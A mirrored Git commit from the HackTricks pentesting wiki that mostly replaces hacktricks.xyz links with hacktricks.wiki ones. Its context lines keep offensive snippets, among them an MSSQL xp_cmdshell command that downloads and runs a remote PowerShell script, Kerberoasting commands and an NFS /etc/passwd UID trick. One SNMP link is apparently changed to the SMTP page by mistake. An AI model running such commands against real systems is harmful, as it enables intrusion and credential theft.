mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge branch 'master' of github.com:HackTricks-wiki/hacktricks
This commit is contained in:
Carlos Polop
commit
04f453fea8
@ -289,7 +289,7 @@
|
||||
- [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md)
|
||||
- [WinRM](windows-hardening/lateral-movement/winrm.md)
|
||||
- [WmiExec](windows-hardening/lateral-movement/wmiexec.md)
|
||||
- [Pivoting to the Cloud$$external:https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements$$]()
|
||||
- [Pivoting to the Cloud$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html$$]()
|
||||
- [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md)
|
||||
- [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)
|
||||
- [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md)
|
||||
@ -692,9 +692,9 @@
|
||||
|
||||
# ⛈️ Cloud Security
|
||||
|
||||
- [Pentesting Kubernetes$$external:https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security$$]()
|
||||
- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology$$]()
|
||||
- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.xyz/pentesting-ci-cd/pentesting-ci-cd-methodology$$]()
|
||||
- [Pentesting Kubernetes$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/index.html$$]()
|
||||
- [Pentesting Cloud (AWS, GCP, Az...)$$external:https://cloud.hacktricks.wiki/en/pentesting-cloud/pentesting-cloud-methodology.html$$]()
|
||||
- [Pentesting CI/CD (Github, Jenkins, Terraform...)$$external:https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html$$]()
|
||||
|
||||
# 😎 Hardware/Physical Access
|
||||
|
||||
|
||||
@ -4,7 +4,7 @@
|
||||
|
||||
## Basic Information
|
||||
|
||||
If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). But for now just know that Electron runs **node**.\
|
||||
If you don't know what Electron is you can find [**lots of information here**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation). But for now just know that Electron runs **node**.\
|
||||
And node has some **parameters** and **env variables** that can be use to **make it execute other code** apart from the indicated file.
|
||||
|
||||
### Electron Fuses
|
||||
|
||||
@ -85,7 +85,7 @@ Entry_1:
|
||||
Note: |
|
||||
The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/113-pentesting-ident
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/113-pentesting-ident.html
|
||||
|
||||
Entry_2:
|
||||
Name: Enum Users
|
||||
|
||||
@ -74,7 +74,7 @@ Entry_1:
|
||||
|
||||
For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/137-138-139-pentesting-netbios.html
|
||||
|
||||
Entry_2:
|
||||
Name: Find Names
|
||||
|
||||
@ -54,7 +54,7 @@ Entry_1:
|
||||
|
||||
for more details check https://github.com/quentinhardy/odat/wiki
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap
|
||||
|
||||
@ -54,7 +54,7 @@ Entry_1:
|
||||
|
||||
for more details check https://github.com/quentinhardy/odat/wiki
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap
|
||||
|
||||
@ -46,7 +46,7 @@ Entry_1:
|
||||
The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information.
|
||||
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-smtp
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -9,7 +9,7 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P
|
||||
For more information check:
|
||||
|
||||
{{#ref}}
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum
|
||||
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html
|
||||
{{#endref}}
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
@ -291,7 +291,7 @@ Entry_1:
|
||||
print(s.run_cmd('ipconfig'))
|
||||
print(s.run_ps('ipconfig'))
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-winrm
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html
|
||||
|
||||
Entry_2:
|
||||
Name: Hydra Brute Force
|
||||
|
||||
@ -119,7 +119,7 @@ Entry_1:
|
||||
cd /mnt
|
||||
nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/nfs-service-pentesting
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/nfs-service-pentesting.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap
|
||||
|
||||
@ -233,7 +233,7 @@ Entry_1:
|
||||
Domain_Name
|
||||
exit
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-dns
|
||||
https://book.hacktricks.wiki/en/todo/pentesting-dns.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -245,7 +245,7 @@ Entry_1:
|
||||
wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
|
||||
if PASV transfer is disabled
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-ftp
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ftp/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -173,7 +173,7 @@ Entry_1:
|
||||
Note: |
|
||||
The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-imap
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-imap.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -49,7 +49,7 @@ Entry_1:
|
||||
Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
|
||||
In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Pre-Creds
|
||||
|
||||
@ -396,7 +396,7 @@ Entry_1:
|
||||
Note: |
|
||||
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-ldap
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -673,7 +673,7 @@ Entry_1:
|
||||
xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
|
||||
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap for SQL
|
||||
|
||||
@ -623,7 +623,7 @@ Entry_1:
|
||||
Note: |
|
||||
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-mysql
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap
|
||||
|
||||
@ -71,7 +71,7 @@ Entry_1:
|
||||
Note: |
|
||||
The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-ntp
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ntp.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap
|
||||
|
||||
@ -98,7 +98,7 @@ Entry_1:
|
||||
Note: |
|
||||
Post Office Protocol (POP) is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of POP clients typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, POP3 stands out as the most prevalently employed version.
|
||||
|
||||
https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-pop.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -136,7 +136,7 @@ Entry_1:
|
||||
Note: |
|
||||
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-rdp
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html
|
||||
|
||||
Entry_2:
|
||||
Name: Nmap
|
||||
|
||||
@ -99,7 +99,7 @@ Entry_1:
|
||||
Note: |
|
||||
Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html
|
||||
|
||||
Entry_2:
|
||||
Name: rpc info
|
||||
|
||||
@ -559,7 +559,7 @@ Entry_1:
|
||||
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
|
||||
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-smb
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Enum4Linux
|
||||
|
||||
@ -559,7 +559,7 @@ Entry_1:
|
||||
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
|
||||
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-smb
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Enum4Linux
|
||||
|
||||
@ -564,7 +564,7 @@ Entry_1:
|
||||
Note: |
|
||||
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-smtp
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -256,7 +256,7 @@ Entry_1:
|
||||
Note: |
|
||||
SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-snmp
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: SNMP Check
|
||||
|
||||
@ -57,7 +57,7 @@ Entry_1:
|
||||
wireshark to hear creds being passed
|
||||
tcp.port == 23 and ip.addr != myip
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-telnet
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html
|
||||
|
||||
Entry_2:
|
||||
Name: Banner Grab
|
||||
|
||||
@ -359,7 +359,7 @@ Entry_1:
|
||||
Name: Notes
|
||||
Description: Notes for Web
|
||||
Note: |
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-web
|
||||
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/index.html
|
||||
|
||||
Entry_2:
|
||||
Name: Quick Web Scan
|
||||
|
||||
@ -602,7 +602,7 @@ According to the W3C documentation, the `window.location` and `document.location
|
||||
* [GitHub - angular/dom\_security\_schema.ts](https://github.com/angular/angular/blob/main/packages/compiler/src/schema/dom\_security\_schema.ts)
|
||||
* [XSS in Angular and AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md)
|
||||
* [Angular Universal](https://angular.io/guide/universal)
|
||||
* [DOM XSS](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss)
|
||||
* [DOM XSS](https://book.hacktricks.wiki/en/pentesting-web/xss-cross-site-scripting/dom-xss.html)
|
||||
* [Angular ElementRef](https://angular.io/api/core/ElementRef)
|
||||
* [Angular Renderer2](https://angular.io/api/core/Renderer2)
|
||||
* [Renderer2 Example: Manipulating DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/)
|
||||
|
||||
@ -5,7 +5,7 @@
|
||||
Check this page if you want to learn more about enumerating and abusing Buckets:
|
||||
|
||||
{{#ref}}
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
|
||||
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum
|
||||
{{#endref}}
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@ -9,7 +9,7 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused
|
||||
Learn more about Firebase in:
|
||||
|
||||
{{#ref}}
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum
|
||||
https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html
|
||||
{{#endref}}
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@ -89,7 +89,7 @@ Other useful extensions:
|
||||
|
||||
### Special extension tricks
|
||||
|
||||
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
|
||||
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
|
||||
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
|
||||
|
||||
The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)
|
||||
|
||||
@ -158,7 +158,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
|
||||
For more detailed info about how to abuse AWS cognito check:
|
||||
|
||||
{{#ref}}
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum
|
||||
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html
|
||||
{{#endref}}
|
||||
|
||||
### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
|
||||
|
||||
@ -170,7 +170,7 @@ document.body.append(anchor)
|
||||
a = document.createElement("a")
|
||||
log = []
|
||||
for (let i = 0; i <= 0x10ffff; i++) {
|
||||
a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`
|
||||
a.href = `${String.fromCodePoint(i)}https://hacktricks.wiki`
|
||||
if (a.hostname === "hacktricks.xyz") {
|
||||
log.push(i)
|
||||
}
|
||||
|
||||
@ -6,10 +6,10 @@ Last updated: 02/04/2023
|
||||
|
||||
This Cookies Policy applies to the following websites owned and operated by HackTricks team ("HackTricks", "we", "us" or "our"):
|
||||
|
||||
* hacktricks.xyz
|
||||
* [www.hacktricks.xyz](http://www.hacktricks.xyz/)
|
||||
* book.hacktricks.xyz
|
||||
* cloud.hacktricks.xyz
|
||||
* hacktricks.wiki
|
||||
* [www.hacktricks.wiki](https://www.hacktricks.wiki/)
|
||||
* book.hacktricks.wiki
|
||||
* cloud.hacktricks.wiki
|
||||
|
||||
By using any of these websites, you agree to the use of cookies in accordance with this Cookies Policy. If you do not agree, please disable cookies in your browser settings or refrain from using our websites.
|
||||
|
||||
@ -26,7 +26,7 @@ We use cookies on our websites for the following purposes:
|
||||
3. Functionality cookies: These cookies enable our websites to remember choices you make, such as your language or region, to provide a more personalized experience.
|
||||
4. Targeting/advertising cookies: These cookies are used to deliver relevant ads and marketing communications based on your interests, browsing history, and interactions with our websites.
|
||||
|
||||
Moreover, the pages book.hacktricks.xyz and cloud.hacktricks.xyz are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy).
|
||||
Moreover, the pages book.hacktricks.wiki and cloud.hacktricks.wiki are hosted in Gitbook. You can find more information about Gitbooks cookies in [https://gitbook-1652864889.teamtailor.com/cookie-policy](https://gitbook-1652864889.teamtailor.com/cookie-policy).
|
||||
|
||||
### Third-party cookies
|
||||
|
||||
|
||||
@ -58,7 +58,7 @@ If you need a bibtex you can use something like:
|
||||
author = {"HackTricks Team" or the Authors name of the specific page/trick},
|
||||
title = {Title of the Specific Page},
|
||||
year = {Year of Last Update (check it at the end of the page)},
|
||||
url = {\url{https://book.hacktricks.xyz/specific-page}},
|
||||
url = {\url{https://book.hacktricks.wiki/specific-page}},
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
@ -67,7 +67,7 @@ If you just have access to an AD environment but you don't have any credentials/
|
||||
- Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
- Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
|
||||
- Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
|
||||
- [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
|
||||
- [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html):
|
||||
- Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
|
||||
- If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
|
||||
- Tools:
|
||||
@ -685,7 +685,7 @@ rdp-sessions-abuse.md
|
||||
## AD -> Azure & Azure -> AD
|
||||
|
||||
{{#ref}}
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity
|
||||
https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html
|
||||
{{#endref}}
|
||||
|
||||
## Some General Defenses
|
||||
|
||||
@ -10,9 +10,9 @@ There are different different ways to execute commands in external systems, here
|
||||
- [**AtExec / SchtasksExec**](atexec.md)
|
||||
- [**WinRM**](winrm.md)
|
||||
- [**DCOM Exec**](dcom-exec.md)
|
||||
- [**Pass the cookie**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) (cloud)
|
||||
- [**Pass the PRT**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) (cloud)
|
||||
- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud)
|
||||
- [**Pass the cookie**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html) (cloud)
|
||||
- [**Pass the PRT**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html) (cloud)
|
||||
- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html) (cloud)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user